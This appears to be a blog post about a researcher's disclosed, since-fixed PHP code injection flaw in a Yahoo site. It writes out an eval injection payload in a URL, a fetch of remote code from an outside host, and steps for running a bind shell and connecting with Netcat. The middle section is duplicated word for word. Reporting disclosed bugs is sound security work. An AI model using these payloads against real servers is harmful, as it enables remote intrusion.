Ebrahim Hegazy, A Web application penetration tester, has discovered a critical remote PHP code injection vulnerability in the Yahoo website that could allowed hackers to inject and execute any php code on the Yahoo server.
A PHP Code Injection flaw allows an attacker to execute PHP code such as system or any other php function/code, it occurs when user sends untrusted data to the target through values of the parameters that are reflected inside eval() function.
Ebrahim tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!
1- uploading “bind.sh” which is a bind connection script, into /tmp directory
2- Execute it to make a bind connection with the server
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}
3- Receive the connection from the server on Netcat and now I will be free to run Commands
Actually he used Netcat, this is a Hacking tool it also could be detected by any simple AV/IDS on the system, this could corrupt the whole thing.
Prof of this concept
A PHP Code Injection flaw allows an attacker to execute PHP code such as system or any other php function/code, it occurs when user sends untrusted data to the target through values of the parameters that are reflected inside eval() function.
Ebrahim tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!
1- uploading “bind.sh” which is a bind connection script, into /tmp directory
2- Execute it to make a bind connection with the server
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}
3- Receive the connection from the server on Netcat and now I will be free to run Commands
Actually he used Netcat, this is a Hacking tool it also could be detected by any simple AV/IDS on the system, this could corrupt the whole thing.
Prof of this concept
Yahoo immediately fixed the issue after getting the notification from the Ebrahim Hegazy. He is still waiting for the Bug bounty reward for the bug.
No comments:
Post a Comment